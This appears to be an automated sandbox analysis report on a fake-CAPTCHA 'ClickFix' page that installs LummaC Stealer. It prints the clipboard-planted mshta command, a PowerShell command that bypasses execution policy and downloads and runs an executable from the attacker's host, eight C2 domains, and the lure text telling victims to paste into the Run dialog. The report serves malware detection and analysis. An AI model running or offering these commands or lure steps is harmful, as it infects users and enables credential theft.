Windows Analysis Report
https://rea.grupolalegion.ec/p.php/1

Overview

General Information

Sample URL: https://rea.grupolalegion.ec/p.php/1
Analysis ID: 1631656

Detection

CAPTCHA Scam ClickFix, LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Found malware configuration
Multi AV Scanner detection for dropped file
Yara detected CAPTCHA Scam ClickFix
Yara detected LummaC Stealer
AI detected suspicious Javascript
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
HTML page adds suspicious text to clipboard
HTML page contains obfuscated javascript
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • chrome.exe (PID: 1292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1924,i,3712918176845887802,6985471661213031996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cmd.exe (PID: 4684 cmdline: cmd /K mshta https://rea.grupolalegion.ec/p.php MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 760 cmdline: mshta https://rea.grupolalegion.ec/p.php MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 5292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Captcha.exe (PID: 1920 cmdline: "C:\ProgramData\Captcha.exe" MD5: 05B7F29D1BAEAC0A7513D094BFC12A92)
          • Captcha.exe (PID: 3392 cmdline: none MD5: 05B7F29D1BAEAC0A7513D094BFC12A92)
  • cleanup
{"C2 url": ["culasova.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "Dvh8ui--keu1"}
Source | Rule | Description | Author | Strings
dropped/chromecache_74 | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
12.2.Captcha.exe.14ac000.1.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
12.2.Captcha.exe.14ac000.1.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
12.2.Captcha.exe.1632000.2.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
12.2.Captcha.exe.1632000.2.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
12.3.Captcha.exe.1632000.11.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
1.4.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
1.1.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |

                          System Summary

Source: Process started (seven entries with identical event data, listed by author)
  • Author: Nasreddine Bencherchali (Nextron Systems)
  • Author: Michael Haag
  • Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • Author: frack113
  • Author: Florian Roth (Nextron Systems)
  • Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data:
    Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
    CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
    CommandLine|base64offset|contains:
    Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php
    ParentImage: C:\Windows\SysWOW64\mshta.exe
    ParentProcessId: 760
    ParentProcessName: mshta.exe
    ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
    ProcessId: 5292
    ProcessName: powershell.exe

Source: File created
  • Author: frack113, Nasreddine Bencherchali (Nextron Systems)
  Data:
    EventID: 11
    Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    ProcessId: 5292
    TargetFilename: C:\ProgramData\Captcha.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T13:21:58.720947+0100 | 1810003 | 2 | Potentially Bad Traffic | 190.92.154.206 | 443 | 192.168.2.8 | 49723 | TCP
2025-03-07T13:21:58.547161+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49723 | 190.92.154.206 | 443 | TCP

                          AV Detection

Source: C:\ProgramData\Captcha.exe, Avira: detection malicious, Label: TR/Redcap.lcybk
Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: LummaC {"C2 url": ["culasova.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "Dvh8ui--keu1"}
Source: C:\ProgramData\Captcha.exe, ReversingLabs: Detection: 39%

                          Phishing

Source: Yara match, File source: 1.4.pages.csv, type: HTML
Source: Yara match, File source: 1.1.pages.csv, type: HTML
Source: Yara match, File source: dropped/chromecache_74, type: DROPPED
Source: 0.4.i.script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: https://rea.grupolalegion.ec/p.php/1... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script designed to execute remote commands and potentially steal user data. The combination of these factors indicates a high risk of harm and should be treated with caution.
Source: https://rea.grupolalegion.ec/p.php/1, HTTP Parser: (function(_0x4a4c13,_0x1ba179){const _0x10f3e2=_0x2875,_0x478ffb=_0x4a4c13();while(!![]){try{const _
Source: https://rea.grupolalegion.ec/p.php/1, HTTP Parser: No favicon
Source: unknown, HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49723 version: TLS 1.2

                          Networking

Source: Network traffic, Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49723 -> 190.92.154.206:443
Source: Network traffic, Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 190.92.154.206:443 -> 192.168.2.8:49723
Source: unknown, TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown, TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown, TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
  GET /p.php/1 HTTP/1.1
  Host: rea.grupolalegion.ec
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
  GET /p.php/1?js HTTP/1.1
  Host: rea.grupolalegion.ec
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: */*
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Referer: https://rea.grupolalegion.ec/p.php/1
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: rea.grupolalegion.ec
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://rea.grupolalegion.ec/p.php/1
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
  GET /p.php/1?js HTTP/1.1
  Host: rea.grupolalegion.ec
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
  GET /p.php HTTP/1.1
  Accept: */*
  Accept-Language: en-CH
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rea.grupolalegion.ec
  Connection: Keep-Alive

Source: global traffic, HTTP traffic detected:
  GET /Viber.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: rea.grupolalegion.ec
  Connection: Keep-Alive

Source: global traffic, DNS traffic detected: DNS query: www.google.com
Source: global traffic, DNS traffic detected: DNS query: rea.grupolalegion.ec

Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 796
  date: Fri, 07 Mar 2025 12:21:40 GMT
  server: LiteSpeed
  strict-transport-security: max-age=63072000; includeSubDomains
  x-frame-options: SAMEORIGIN
  x-content-type-options: nosniff
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          Source: unknown | HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49722 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49723 version: TLS 1.2

                          System Summary

                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\Captcha.exe
                          Source: C:\ProgramData\Captcha.exe | Process Stats: CPU usage > 49%
                          Source: C:\ProgramData\Captcha.exe | Code function: 12_2_00537F50 DuplicateHandle, GetCurrentThreadId, CreateWaitableTimerExW, CreateWaitableTimerExW, NtCreateWaitCompletionPacket, VirtualQuery
                          Source: C:\ProgramData\Captcha.exe | Code function: 12_2_00536700 NtCancelWaitCompletionPacket, SetWaitableTimer, NtAssociateWaitCompletionPacket
                          Source: C:\ProgramData\Captcha.exe | Code function: String function: 0053C860 appears 376 times
                          Source: C:\ProgramData\Captcha.exe | Code function: String function: 0056B620 appears 287 times
                          Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                          Source: classification engine | Classification label: mal100.phis.troj.evad.win@27/16@11/5
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj2rl2sh.mjz.ps1
                          Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: Captcha.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable t
                          Source: Captcha.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable t
                          Source: Captcha.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime:
                          Source: Captcha.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime:
                          Source: Captcha.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
                          Source: Captcha.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
                          Source: Captcha.exeString found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
                          Source: Captcha.exeString found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
                          Source: Captcha.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime:
                          Source: Captcha.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime:
                          Source: Captcha.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
                          Source: Captcha.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
                          Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1924,i,3712918176845887802,6985471661213031996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1"
                          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K mshta https://rea.grupolalegion.ec/p.php
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta https://rea.grupolalegion.ec/p.php
                          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
                          Source: C:\ProgramData\Captcha.exe Process created: C:\ProgramData\Captcha.exe none
                          Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                          Source: Google Drive.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: YouTube.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Sheets.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Gmail.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Slides.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Docs.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

                          Data Obfuscation

                          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                          Source: Captcha.exe.10.dr Static PE information: section name: .symtab
                          Source: C:\ProgramData\Captcha.exe Code function: 12_3_0143B3DD push eax; ret 12_3_0143B3DE
                          Source: C:\ProgramData\Captcha.exe Code function: 12_2_00523126 pushfd ; ret 12_2_00523127
                          Source: C:\ProgramData\Captcha.exe Code function: 12_2_0051DD26 pushfd ; ret 12_2_0051DD27

                          Persistence and Installation Behavior

                          barindex
                          Source: Chrome DOM: 1.4OCR Text: rea.grupolalegion.ec Verify tew seconds. Complete these Verification steps To better prove you are nat a rabat, please: 1 . Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3, Press Enter on the keyboard to finish curity of your connection before rea.gr Yau fully agree: I am not a robot - Cloudflare Verification 10: 89ad7f proce Perform the steps above to finish verification VERIFY Ray 10: Performance & security by Cloudflare Claudflare
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://rea.grupolalegion.ec/p.php
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                          Source: C:\Windows\SysWOW64\mshta.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\Captcha.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2962
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 6735
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2688, Thread sleep time: -27670116110564310s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112, Thread sleep time: -922337203685477s >= -30000s
                          Source: mshta.exe, 00000008.00000002.1768596054.0000000006957000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                          Source: mshta.exe, 00000008.00000002.1762272005.0000000003059000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1757390190.0000000003059000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000003016000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1760958120.0000000003059000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761955552.0000000003016000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
                          Source: powershell.exe, 0000000A.00000002.1892100978.000000000721F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(!$1
                          Source: powershell.exe, 0000000A.00000002.1892100978.0000000007236000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information queried: ProcessInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Windows\SysWOW64\mshta.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\mshta.exe mshta https://rea.grupolalegion.ec/p.php
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
                          Source: C:\ProgramData\Captcha.exe, Process created: C:\ProgramData\Captcha.exe none
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
